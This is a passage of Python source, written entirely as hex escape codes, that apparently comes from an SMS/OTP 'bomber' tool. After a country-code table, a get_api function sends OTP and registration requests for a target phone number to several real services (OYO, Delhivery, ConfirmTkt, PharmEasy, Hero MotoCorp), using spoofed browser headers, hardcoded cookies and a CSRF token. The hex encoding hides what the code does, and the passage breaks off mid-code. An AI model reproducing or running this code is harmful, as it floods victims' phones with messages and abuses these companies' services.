\x27\x33\x35\x32\x27\x3a\x20\x27\x4c\x55\x27\x2c\x27\x38
\x35\x33\x27\x3a\x20\x27\x4d\x4f\x27\x2c\x27\x33\x38\x39\x27\x3a\x20\x27\x4d\x4b\x27\x2c\x27\x32\x36\x31\x27\x3a\x20\x27\x4d\x47\x27\x2c\x27\x32\x36\x35\x27\x3a\x20\x27\x4d\x57\x27\x2c\x27\x36\x30\x27\x3a\x20\x27\x4d\x59\x27\x2c\x27\x39\x36\x30\x27\x3a\x20\x27\x4d\x56\x27\x2c\x27\x32\x32\x33\x27\x3a\x20\x27\x4d\x4c\x27\x2c\x27\x33\x35\x36\x27\x3a\x20\x27\x4d\x54\x27\x2c\x27\x36\x39\x32\x27\x3a\x20\x27\x4d\x48\x27\x2c\x27\x32\x32\x32\x27\x3a\x20\x27\x4d\x52\x27\x2c\x27\x32\x33\x30\x27\x3a\x20\x27\x4d\x55\x27\x2c\x27\x32\x36\x32\x27\x3a\x20\x27\x52\x45\x27\x2c\x27\x35\x32\x27\x3a\x20\x27\x4d\x58\x27\x2c\x27\x36\x39\x31\x27\x3a\x20\x27\x46\x4d\x27\x2c\x27\x33\x37\x33\x27\x3a\x20\x27\x4d\x44\x27\x2c\x27\x33\x37\x37\x27\x3a\x20\x27\x4d\x43\x27\x2c\x27\x39\x37\x36\x27\x3a\x20\x27\x4d\x4e\x27\x2c\x27\x33\x38\x32\x27\x3a\x20\x27\x4d\x45\x27\x2c\x27\x32\x31\x32\x27\x3a\x20\x27\x45\x48\x27\x2c\x27\x32\x35\x38\x27\x3a\x20\x27\x4d\x5a\x27\x2c\x27\x39\x35\x27\x3a\x20\x27\x4d\x4d\x27\x2c\x27\x32\x36\x34\x27\x3a\x20\x27\x4e\x41\x27\x2c\x27\x36\x37\x34\x27\x3a\x20\x27\x4e\x52\x27\x2c\x27\x39\x37\x37\x27\x3a\x20\x27\x4e\x50\x27\x2c\x27\x33\x31\x27\x3a\x20\x27\x4e\x4c\x27\x2c\x27\x36\x38\x37\x27\x3a\x20\x27\x4e\x43\x27\x2c\x27\x36\x34\x27\x3a\x20\x27\x4e\x5a\x27\x2c\x27\x35\x30\x35\x27\x3a\x20\x27\x4e\x49\x27\x2c\x27\x32\x32\x37\x27\x3a\x20\x27\x4e\x45\x27\x2c\x27\x32\x33\x34\x27\x3a\x20\x27\x4e\x47\x27\x2c\x27\x36\x38\x33\x27\x3a\x20\x27\x4e\x55\x27\x2c\x27\x38\x35\x30\x27\x3a\x20\x27\x4b\x50\x27\x2c\x27\x34\x37\x27\x3a\x20\x27\x53\x4a\x27\x2c\x27\x39\x36\x38\x27\x3a\x20\x27\x4f\x4d\x27\x2c\x27\x39\x32\x27\x3a\x20\x27\x50\x4b\x27\x2c\x27\x36\x38\x30\x27\x3a\x20\x27\x50\x57\x27\x2c\x27\x39\x37\x30\x27\x3a\x20\x27\x50\x53\x27\x2c\x27\x35\x30\x37\x27\x3a\x20\x27\x50\x41\x27\x2c\x27\x36\x37\x35\x27\x3a\x20\x27\x50\x47\x27\x2c\x27\x35\x39\x35\x27\x3a\x20\x27\x50\x59\x27\x2c\x27\x35\x31\x27\x3a\x20\x27\x50\x45\x27\x2c\x27\x36\x33\x27\x3a\x20\x27\x50\x48\x27\x2c\x27\x34\x38\x27\x3a\x20\x27
\x50\x4c\x27\x2c\x27\x33\x35\x31\x27\x3a\x20\x27\x50\x54\x27\x2c\x27\x39\x37\x34\x27\x3a\x20\x27\x51\x41\x27\x2c\x27\x32\x34\x32\x27\x3a\x20\x27\x43\x47\x27\x2c\x27\x34\x30\x27\x3a\x20\x27\x52\x4f\x27\x2c\x27\x37\x27\x3a\x20\x27\x52\x55\x27\x2c\x27\x32\x35\x30\x27\x3a\x20\x27\x52\x57\x27\x2c\x27\x35\x39\x30\x27\x3a\x20\x27\x4d\x46\x27\x2c\x27\x32\x39\x30\x27\x3a\x20\x27\x53\x48\x27\x2c\x27\x35\x30\x38\x27\x3a\x20\x27\x50\x4d\x27\x2c\x27\x36\x38\x35\x27\x3a\x20\x27\x57\x53\x27\x2c\x27\x33\x37\x38\x27\x3a\x20\x27\x53\x4d\x27\x2c\x27\x32\x33\x39\x27\x3a\x20\x27\x53\x54\x27\x2c\x27\x39\x36\x36\x27\x3a\x20\x27\x53\x41\x27\x2c\x27\x32\x32\x31\x27\x3a\x20\x27\x53\x4e\x27\x2c\x27\x33\x38\x31\x27\x3a\x20\x27\x52\x53\x27\x2c\x27\x32\x34\x38\x27\x3a\x20\x27\x53\x43\x27\x2c\x27\x32\x33\x32\x27\x3a\x20\x27\x53\x4c\x27\x2c\x27\x36\x35\x27\x3a\x20\x27\x53\x47\x27\x2c\x27\x34\x32\x31\x27\x3a\x20\x27\x53\x4b\x27\x2c\x27\x33\x38\x36\x27\x3a\x20\x27\x53\x49\x27\x2c\x27\x36\x37\x37\x27\x3a\x20\x27\x53\x42\x27\x2c\x27\x32\x35\x32\x27\x3a\x20\x27\x53\x4f\x27\x2c\x27\x32\x37\x27\x3a\x20\x27\x5a\x41\x27\x2c\x27\x38\x32\x27\x3a\x20\x27\x4b\x52\x27\x2c\x27\x32\x31\x31\x27\x3a\x20\x27\x53\x53\x27\x2c\x27\x33\x34\x27\x3a\x20\x27\x45\x53\x27\x2c\x27\x39\x34\x27\x3a\x20\x27\x4c\x4b\x27\x2c\x27\x32\x34\x39\x27\x3a\x20\x27\x53\x44\x27\x2c\x27\x35\x39\x37\x27\x3a\x20\x27\x53\x52\x27\x2c\x27\x32\x36\x38\x27\x3a\x20\x27\x53\x5a\x27\x2c\x27\x34\x36\x27\x3a\x20\x27\x53\x45\x27\x2c\x27\x34\x31\x27\x3a\x20\x27\x43\x48\x27\x2c\x27\x39\x36\x33\x27\x3a\x20\x27\x53\x59\x27\x2c\x27\x38\x38\x36\x27\x3a\x20\x27\x54\x57\x27\x2c\x27\x39\x39\x32\x27\x3a\x20\x27\x54\x4a\x27\x2c\x27\x32\x35\x35\x27\x3a\x20\x27\x54\x5a\x27\x2c\x27\x36\x36\x27\x3a\x20\x27\x54\x48\x27\x2c\x27\x32\x32\x38\x27\x3a\x20\x27\x54\x47\x27\x2c\x27\x36\x39\x30\x27\x3a\x20\x27\x54\x4b\x27\x2c\x27\x36\x37\x36\x27\x3a\x20\x27\x54\x4f\x27\x2c\x27\x32\x31\x36\x27\x3a\x20\x27\x54\x4e\x27\x2c\x27\x39\x30\x27\x3a\x20\x27\x54\x52\x27\x2c\x27\x39\x39\x33
\x27\x3a\x20\x27\x54\x4d\x27\x2c\x27\x36\x38\x38\x27\x3a\x20\x27\x54\x56\x27\x2c\x27\x32\x35\x36\x27\x3a\x20\x27\x55\x47\x27\x2c\x27\x33\x38\x30\x27\x3a\x20\x27\x55\x41\x27\x2c\x27\x39\x37\x31\x27\x3a\x20\x27\x41\x45\x27\x2c\x27\x34\x34\x27\x3a\x20\x27\x47\x42\x27\x2c\x27\x31\x27\x3a\x20\x27\x55\x53\x27\x2c\x27\x35\x39\x38\x27\x3a\x20\x27\x55\x59\x27\x2c\x27\x39\x39\x38\x27\x3a\x20\x27\x55\x5a\x27\x2c\x27\x36\x37\x38\x27\x3a\x20\x27\x56\x55\x27\x2c\x27\x33\x37\x39\x27\x3a\x20\x27\x56\x41\x27\x2c\x27\x35\x38\x27\x3a\x20\x27\x56\x45\x27\x2c\x27\x38\x34\x27\x3a\x20\x27\x56\x4e\x27\x2c\x27\x36\x38\x31\x27\x3a\x20\x27\x57\x46\x27\x2c\x27\x39\x36\x37\x27\x3a\x20\x27\x59\x45\x27\x2c\x27\x32\x36\x30\x27\x3a\x20\x27\x5a\x4d\x27\x2c\x27\x32\x36\x33\x27\x3a\x20\x27\x5a\x57\x27\x7d\x0a\x0a\x0a\x64\x65\x66\x20\x74\x65\x73\x74\x28\x29\x3a\x0a\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x74\x61\x72\x67\x65\x74\x2c\x20\x63\x6f\x75\x6e\x74\x65\x72\x2c\x20\x64\x65\x6c\x61\x79\x2c\x20\x63\x68\x2c\x20\x63\x63\x29\x0a\x0a\x64\x65\x66\x20\x67\x65\x74\x5f\x61\x70\x69\x28\x70\x6e\x2c\x6c\x69\x6d\x2c\x63\x63\x29\x3a\x0a\x20\x20\x20\x20\x63\x63\x3d\x73\x74\x72\x28\x63\x63\x29\x0a\x20\x20\x20\x20\x70\x6e\x3d\x73\x74\x72\x28\x70\x6e\x29\x0a\x20\x20\x20\x20\x6c\x69\x6d\x20\x3d\x20\x69\x6e\x74\x28\x6c\x69\x6d\x29\x0a\x20\x20\x20\x20\x75\x72\x6c\x20\x3d\x20\x5b\x22\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x6f\x79\x6f\x72\x6f\x6f\x6d\x73\x2e\x63\x6f\x6d\x2f\x61\x70\x69\x2f\x70\x77\x61\x2f\x67\x65\x6e\x65\x72\x61\x74\x65\x6f\x74\x70\x3f\x63\x6f\x75\x6e\x74\x72\x79\x5f\x63\x6f\x64\x65\x3d\x25\x32\x42\x22\x20\x2b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x73\x74\x72\x28\x63\x63\x29\x20\x2b\x20\x22\x26\x6e\x6f\x64\x3d\x34\x26\x70\x68\x6f\x6e\x65\x3d\x22\x20\x2b\x20\x70\x6e\x2c\x20\x22\x68\x74\x74\x70\x73\x3a\x2f\x2f\x64\x69\x72\x65\x63\x74\x2e\x64\x65\x6c\x68\x69\x76\x65\x72\x79\x2e\x63\x6f\x6d\x2f\x64\x65\x6c\x68\x69\x76\x65\x72\x79\x64\x69\x72\x65\x63\x74\x2f\x6f\x72\x64\x65\x72\x2f\x67\x65
\x6e\x65\x72\x61\x74\x65\x2d\x6f\x74\x70\x3f\x70\x68\x6f\x6e\x65\x4e\x6f\x3d\x22\x20\x2b\x20\x70\x6e\x2c\x20\x22\x68\x74\x74\x70\x73\x3a\x2f\x2f\x73\x65\x63\x75\x72\x65\x64\x61\x70\x69\x2e\x63\x6f\x6e\x66\x69\x72\x6d\x74\x6b\x74\x2e\x63\x6f\x6d\x2f\x61\x70\x69\x2f\x70\x6c\x61\x74\x66\x6f\x72\x6d\x2f\x72\x65\x67\x69\x73\x74\x65\x72\x3f\x6d\x6f\x62\x69\x6c\x65\x4e\x75\x6d\x62\x65\x72\x3d\x22\x20\x2b\x20\x70\x6e\x5d\x0a\x20\x20\x20\x20\x74\x72\x79\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x20\x6c\x69\x6d\x20\x3c\x20\x6c\x65\x6e\x28\x75\x72\x6c\x29\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x75\x72\x6c\x6c\x69\x62\x2e\x72\x65\x71\x75\x65\x73\x74\x2e\x75\x72\x6c\x6f\x70\x65\x6e\x28\x73\x74\x72\x28\x75\x72\x6c\x5b\x6c\x69\x6d\x5d\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x20\x54\x72\x75\x65\x0a\x20\x20\x20\x20\x65\x78\x63\x65\x70\x74\x20\x28\x75\x72\x6c\x6c\x69\x62\x2e\x65\x72\x72\x6f\x72\x2e\x48\x54\x54\x50\x45\x72\x72\x6f\x72\x2c\x20\x75\x72\x6c\x6c\x69\x62\x2e\x65\x72\x72\x6f\x72\x2e\x55\x52\x4c\x45\x72\x72\x6f\x72\x29\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x20\x46\x61\x6c\x73\x65\x0a\x20\x20\x20\x20\x69\x66\x20\x6c\x69\x6d\x20\x3d\x3d\x20\x33\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x68\x65\x61\x64\x65\x72\x73\x20\x3d\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x48\x6f\x73\x74\x27\x3a\x20\x27\x70\x68\x61\x72\x6d\x65\x61\x73\x79\x2e\x69\x6e\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x27\x3a\x20\x27\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x31\x30\x2e\x30\x3b\x20\x57\x69\x6e\x36\x34\x3b\x20\x78\x36\x34\x3b\x20\x72\x76\x3a\x36\x35\x2e\x30\x29\x20\x47\x65\x63\x6b\x6f\x2f\x32\x30\x31\x30\x30\x31\x30\x31\x20\x46\x69\x72\x65\x66\x6f\x78\x2f\x36\x35\x2e\x30\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x63\x63\x65\x70\x74\x27\x3a\x20\x27
\x2a\x2f\x2a\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x63\x63\x65\x70\x74\x2d\x4c\x61\x6e\x67\x75\x61\x67\x65\x27\x3a\x20\x27\x65\x6e\x2d\x55\x53\x2c\x65\x6e\x3b\x71\x3d\x30\x2e\x35\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x63\x63\x65\x70\x74\x2d\x45\x6e\x63\x6f\x64\x69\x6e\x67\x27\x3a\x20\x27\x67\x7a\x69\x70\x2c\x20\x64\x65\x66\x6c\x61\x74\x65\x2c\x20\x62\x72\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x52\x65\x66\x65\x72\x65\x72\x27\x3a\x20\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x68\x61\x72\x6d\x65\x61\x73\x79\x2e\x69\x6e\x2f\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x27\x3a\x20\x27\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x6a\x73\x6f\x6e\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x4c\x65\x6e\x67\x74\x68\x27\x3a\x20\x27\x33\x30\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x27\x3a\x20\x27\x6b\x65\x65\x70\x2d\x61\x6c\x69\x76\x65\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x64\x61\x74\x61\x20\x3d\x20\x7b\x22\x63\x6f\x6e\x74\x61\x63\x74\x4e\x75\x6d\x62\x65\x72\x22\x3a\x70\x6e\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x73\x70\x6f\x6e\x73\x65\x20\x3d\x20\x72\x65\x71\x75\x65\x73\x74\x73\x2e\x70\x6f\x73\x74\x28\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x68\x61\x72\x6d\x65\x61\x73\x79\x2e\x69\x6e\x2f\x61\x70\x69\x2f\x61\x75\x74\x68\x2f\x72\x65\x71\x75\x65\x73\x74\x4f\x54\x50\x27\x2c\x20\x68\x65\x61\x64\x65\x72\x73\x3d\x68\x65\x61\x64\x65\x72\x73\x2c\x20\x6a\x73\x6f\x6e\x3d\x64\x61\x74\x61\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x20\x72\x65\x73\x70\x6f\x6e\x73\x65\x2e\x73\x74\x61\x74\x75\x73\x5f\x63\x6f\x64\x65\x3d\x3d\x32\x30\x30\x0a\x20\x20\x20\x20\x65\x6c\x69\x66\x20\x6c\x69\x6d\x20\x3d\x3d\x20\x34\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20
\x63\x6f\x6f\x6b\x69\x65\x73\x20\x3d\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x5f\x67\x61\x27\x3a\x20\x27\x47\x41\x31\x2e\x32\x2e\x31\x32\x37\x33\x34\x36\x30\x36\x31\x30\x2e\x31\x35\x36\x31\x31\x39\x31\x35\x36\x35\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x5f\x67\x69\x64\x27\x3a\x20\x27\x47\x41\x31\x2e\x32\x2e\x31\x37\x32\x35\x37\x34\x32\x39\x39\x2e\x31\x35\x36\x31\x31\x39\x31\x35\x36\x35\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x5f\x67\x63\x6c\x5f\x61\x75\x27\x3a\x20\x27\x31\x2e\x31\x2e\x38\x33\x33\x35\x35\x36\x36\x36\x30\x2e\x31\x35\x36\x31\x31\x39\x31\x35\x36\x36\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x5f\x66\x62\x70\x27\x3a\x20\x27\x66\x62\x2e\x31\x2e\x31\x35\x36\x31\x31\x39\x31\x35\x36\x38\x37\x30\x39\x2e\x31\x37\x30\x37\x37\x32\x32\x31\x32\x36\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x50\x48\x50\x53\x45\x53\x53\x49\x44\x27\x3a\x20\x27\x6d\x35\x74\x61\x70\x37\x6e\x72\x37\x35\x62\x32\x65\x68\x63\x6e\x38\x75\x72\x32\x36\x31\x6f\x71\x38\x36\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x7d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x68\x65\x61\x64\x65\x72\x73\x3d\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x48\x6f\x73\x74\x27\x3a\x20\x27\x77\x77\x77\x2e\x68\x65\x72\x6f\x6d\x6f\x74\x6f\x63\x6f\x72\x70\x2e\x63\x6f\x6d\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x27\x3a\x20\x27\x6b\x65\x65\x70\x2d\x61\x6c\x69\x76\x65\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x4c\x65\x6e\x67\x74\x68\x27\x3a\x20\x27\x31\x32\x36\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x63\x63\x65\x70\x74\x27\x3a\x20\x27\x2a\x2f\x2a\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x4f\x72\x69\x67\x69\x6e\x27\x3a\x20\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x68\x65\x72\x6f\x6d\x6f\x74\x6f\x63\x6f\x72\x70\x2e\x63\x6f\x6d\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x58\x2d\x52\x65
\x71\x75\x65\x73\x74\x65\x64\x2d\x57\x69\x74\x68\x27\x3a\x20\x27\x58\x4d\x4c\x48\x74\x74\x70\x52\x65\x71\x75\x65\x73\x74\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x53\x61\x76\x65\x2d\x44\x61\x74\x61\x27\x3a\x20\x27\x6f\x6e\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x27\x3a\x20\x27\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x4c\x69\x6e\x75\x78\x3b\x20\x41\x6e\x64\x72\x6f\x69\x64\x20\x38\x2e\x31\x2e\x30\x3b\x20\x76\x69\x76\x6f\x20\x31\x37\x31\x38\x29\x20\x41\x70\x70\x6c\x65\x57\x65\x62\x4b\x69\x74\x2f\x35\x33\x37\x2e\x33\x36\x20\x28\x4b\x48\x54\x4d\x4c\x2c\x20\x6c\x69\x6b\x65\x20\x47\x65\x63\x6b\x6f\x29\x20\x43\x68\x72\x6f\x6d\x65\x2f\x37\x35\x2e\x30\x2e\x33\x37\x37\x30\x2e\x31\x30\x31\x20\x4d\x6f\x62\x69\x6c\x65\x20\x53\x61\x66\x61\x72\x69\x2f\x35\x33\x37\x2e\x33\x36\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x27\x3a\x20\x27\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x2d\x77\x77\x77\x2d\x66\x6f\x72\x6d\x2d\x75\x72\x6c\x65\x6e\x63\x6f\x64\x65\x64\x3b\x20\x63\x68\x61\x72\x73\x65\x74\x3d\x55\x54\x46\x2d\x38\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x52\x65\x66\x65\x72\x65\x72\x27\x3a\x20\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x68\x65\x72\x6f\x6d\x6f\x74\x6f\x63\x6f\x72\x70\x2e\x63\x6f\x6d\x2f\x65\x6e\x2d\x69\x6e\x2f\x78\x70\x75\x6c\x73\x65\x32\x30\x30\x2f\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x63\x63\x65\x70\x74\x2d\x45\x6e\x63\x6f\x64\x69\x6e\x67\x27\x3a\x20\x27\x67\x7a\x69\x70\x2c\x20\x64\x65\x66\x6c\x61\x74\x65\x2c\x20\x62\x72\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x63\x63\x65\x70\x74\x2d\x4c\x61\x6e\x67\x75\x61\x67\x65\x27\x3a\x20\x27\x65\x6e\x2d\x49\x4e\x2c\x65\x6e\x3b\x71\x3d\x30\x2e\x39\x2c\x65\x6e\x2d\x47\x42\x3b\x71\x3d\x30\x2e\x38\x2c\x65\x6e\x2d\x55\x53\x3b\x71\x3d\x30\x2e\x37\x2c\x68\x69\x3b\x71\x3d
\x30\x2e\x36\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x64\x61\x74\x61\x20\x3d\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x6d\x6f\x62\x69\x6c\x65\x5f\x6e\x6f\x27\x3a\x20\x70\x6e\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x72\x61\x6e\x64\x6f\x6d\x65\x27\x3a\x20\x27\x5a\x5a\x55\x43\x39\x57\x43\x43\x50\x33\x6c\x74\x73\x64\x2f\x4a\x6f\x71\x46\x65\x35\x48\x48\x65\x36\x57\x66\x4e\x5a\x66\x64\x51\x78\x71\x69\x39\x4f\x5a\x57\x76\x4b\x69\x73\x3d\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x6d\x6f\x62\x69\x6c\x65\x5f\x6e\x6f\x5f\x6f\x74\x70\x27\x3a\x20\x27\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x63\x73\x72\x66\x27\x3a\x20\x27\x35\x32\x33\x62\x63\x33\x66\x61\x31\x38\x35\x37\x63\x34\x64\x66\x39\x35\x65\x34\x64\x32\x34\x62\x62\x64\x33\x36\x63\x36\x31\x62\x27\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x73\x70\x6f\x6e\x73\x65\x20\x3d\x20\x72\x65\x71\x75\x65\x73\x74\x73\x2e\x70\x6f\x73\x74\x28\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x68\x65\x72\x6f\x6d\x6f\x74\x6f\x63\x6f\x72\x70\x2e\x63\x6f\x6d\x2f\x65\x6e\x2d\x69\x6e\x2f\x78\x70\x75\x6c\x73\x65\x32\x30\x30\x2f\x61\x6a\x61\x78\x5f\x64\x61\x74\x61\x2e\x70\x68\x70\x27\x2c\x20\x68\x65\x61\x64\x65\x72\x73\x3d\x68\x65\x61\x64\x65\x72\x73\x2c\x20\x63\x6f\x6f\x6b\x69\x65\x73\x3d\x63\x6f\x6f\x6b\x69\x65\x73\x2c\x20\x64\x61\x74\x61\x3d\x64\x61\x74\x61\x29\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x20\x72\x65\x73\x70\x6f\x6e\x73\x65\x2e\x73\x74\x61\x74\x75\x73\x5f\x63\x6f\x64\x65\x3d\x3d\x32\x30\x30\x0a\x20\x20\x20\x20\x65\x6c\x69\x66\x20\x6c\x69\x6d\x20\x3d\x3d\x20\x35\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x63\x6f\x6f\x6b\x69\x65\x73\x20\x3d\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6f\x6b\x69\x65\x3a\x5f\x67\x61\x27\x3a\x20\x27\x47\x41\x31\x2e\x32\x2e\x31\x34\x38\x33\x38\x38\x35\x33\x31\x34\x2e\x31\x35\x35\x39\x31\x35
\x37\x36\x34\x36\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x5f\x66\x62\x70\x27\x3a\x20\x27\x66\x62\x2e\x31\x2e\x31\x35\x35\x39\x31\x35\x37\x36\x34\x37\x31\x36\x31\x2e\x31\x39\x38\x39\x32\x30\x35\x31\x33\x38\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x54\x69\x50\x4d\x69\x78\x27\x3a\x20\x27\x39\x31\x2e\x39\x39\x30\x39\x31\x38\x35\x32\x32\x36\x39\x36\x34\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x67\x63\x62\x5f\x74\x5f\x74\x72\x61\x63\x6b\x27\x3a\x20\x27\x53\x45\x4f\x20\x2d\x20\x47\x6f\x6f\x67\x6c\x65\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x67\x63\x62\x5f\x74\x5f\x6b\x65\x79\x77\x6f\x72\x64\x27\x3a\x20\x27\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x67\x63\x62\x5f\x74\x5f\x6c\x5f\x75\x72\x6c\x27\x3a\x20\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x67\x6f\x6f\x67\x6c\x65\x2e\x63\x6f\x6d\x2f\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x67\x63\x62\x5f\x75\x74\x6d\x5f\x6d\x65\x64\x69\x75\x6d\x27\x3a\x20\x27\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x67\x63\x62\x5f\x75\x74\x6d\x5f\x63\x61\x6d\x70\x61\x69\x67\x6e\x27\x3a\x20\x27\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x53\x50\x2e\x4e\x45\x54\x5f\x53\x65\x73\x73\x69\x6f\x6e\x49\x64\x27\x3a\x20\x27\x69\x6f\x71\x6b\x65\x6b\x35\x6c\x62\x67\x76\x6c\x64\x6c\x71\x34\x69\x33\x63\x6d\x69\x6a\x63\x73\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x77\x65\x62\x5f\x61\x70\x70\x5f\x6c\x61\x6e\x64\x69\x6e\x67\x5f\x75\x74\x6d\x5f\x73\x6f\x75\x72\x63\x65\x27\x3a\x20\x27\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x77\x65\x62\x5f\x61\x70\x70\x5f\x6c\x61\x6e\x64\x69\x6e\x67\x5f\x75\x72\x6c\x27\x3a\x20\x27\x2f\x70\x65\x72\x73\x6f\x6e\x61\x6c\x2d\x6c\x6f\x61\x6e\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x77\x65\x62\x61\x70\x70\x5f\x6c\x61\x6e\x64\x69\x6e\x67\x5f\x72\x65\x66\x65\x72\x72\x61\x6c\x5f\x75
